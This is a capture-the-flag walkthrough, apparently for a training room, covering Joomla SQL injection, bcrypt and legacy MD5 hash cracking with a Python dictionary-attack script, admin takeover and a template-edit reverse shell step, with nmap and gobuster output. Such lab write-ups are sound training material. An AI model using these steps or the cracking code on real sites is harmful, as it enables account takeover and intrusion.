Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
attacker: 10.10.153.185  target: 10.10.153.27
- port scanning
nmap -sC -sV <ip>
- directory brute force
gobuster dir -u http://<ip> -w <wordlist>
- check the admin page found (/administrator/)
- find the Joomla version
- search for exploits matching that version
- use the SQLi exploit to dump the Super User's password hash from the users table
- note the username and hash
- crack with hashcat (-a 0 = straight wordlist attack, -m 3200 = bcrypt, the $2y$ format Joomla stores) or john
hashcat -a 0 -m 3200 <hash_file> <wordlist>
or john <hash_file> --wordlist=<path> --format=bcrypt
- log into the admin panel with the cracked password
- open the template files (Extensions > Templates)
- edit a file in the template so it executes a reverse shell, then request that file
- get flags
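Added example for the cracking step above (my code, not part of the room or its notes): it takes a dumped Joomla user row in the layout the exploit output below uses, tells the two hash formats Joomla has stored apart (bcrypt $2y$ from Joomla 3.x, hashcat mode 3200; the older md5(password+salt):salt layout, hashcat mode 11) and runs a wordlist against the hash offline. The salt, the password "password123" and the four-word wordlist are constructed stand-ins; the real hash from the target is not reproduced. Checking a $2y$ hash locally needs the third-party bcrypt package, which is assumed to be installed only for that path.

```python
"""Identify a dumped Joomla password hash and run an offline dictionary attack."""
import hashlib
import re
from typing import Iterable, Optional

try:
    import bcrypt  # third-party package; only needed to check $2y$ hashes locally
except ImportError:
    bcrypt = None

# Constructed sample row in the exploit's output layout (id, name, username, email,
# password, ...). The hash here is a legacy md5:salt hash of "password123", built
# inline so the example runs without the real dump.
SALT = "3zYu5xQ2"
LEGACY_HASH = hashlib.md5(("password123" + SALT).encode()).hexdigest() + ":" + SALT
SAMPLE_ROW = ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', LEGACY_HASH, '', '']

# Constructed stand-in for rockyou.txt
WORDLIST = ["123456", "letmein", "password123", "spiderman"]

BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$.{53}$")       # $2y$10$<22 salt><31 hash>
LEGACY_RE = re.compile(r"^([0-9a-f]{32}):(.+)$")          # md5hex:salt


def hash_from_row(row) -> str:
    """The password column is the fifth field of the dumped row."""
    return row[4]


def identify(h: str) -> dict:
    """Map a Joomla password value to cracker settings.

    Joomla 3.x writes bcrypt with a $2y$ prefix -> hashcat -m 3200, john --format=bcrypt.
    Joomla before 2.5.18 wrote md5(password + salt) + ':' + salt -> hashcat -m 11.
    """
    if BCRYPT_RE.match(h):
        return {"kind": "bcrypt", "hashcat_mode": 3200, "john_format": "bcrypt"}
    if LEGACY_RE.match(h):
        return {"kind": "joomla-md5", "hashcat_mode": 11, "john_format": None}
    raise ValueError("unrecognised Joomla hash: %r" % h)


def check(h: str, candidate: str) -> bool:
    """Return True if candidate is the password behind hash h."""
    kind = identify(h)["kind"]
    if kind == "joomla-md5":
        digest, salt = h.split(":", 1)
        return hashlib.md5((candidate + salt).encode()).hexdigest() == digest
    if bcrypt is None:
        raise RuntimeError("bcrypt module missing; hand this hash to hashcat -m 3200")
    # pyca/bcrypt rewrites the $2y$ prefix Joomla uses to $2b$ before comparing
    return bcrypt.checkpw(candidate.encode(), h.encode())


def crack(h: str, wordlist: Iterable[str]) -> Optional[str]:
    """Straight wordlist attack (what hashcat -a 0 does); returns the hit or None."""
    for word in wordlist:
        word = word.rstrip("\n")
        if check(h, word):
            return word
    return None


def hashcat_command(h: str, hash_file: str = "hash.txt", wordlist_path: str = "rockyou.txt") -> str:
    """Build the hashcat invocation with the right mode for this hash format."""
    return "hashcat -a 0 -m %d %s %s" % (identify(h)["hashcat_mode"], hash_file, wordlist_path)


if __name__ == "__main__":
    h = hash_from_row(SAMPLE_ROW)
    print(identify(h))
    print(hashcat_command(h))
    print("cracked:", crack(h, WORDLIST))
```

For a real dump, write the hash field to hash.txt on its own line and pass rockyou.txt; the Python loop is there to show what the cracker does, bcrypt with cost 10 is slow enough in pure Python that hashcat is the tool to actually run it with.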
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
/images (Status: 301)
/media (Status: 301)
/templates (Status: 301)
/bin (Status: 301)
/libraries (Status: 301)
/includes (Status: 301)
/plugins (Status: 301)
/language (Status: 301)
/modules (Status: 301)
/tmp (Status: 301)
/cache (Status: 301)
/layouts (Status: 301)
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '<hash>', '', '']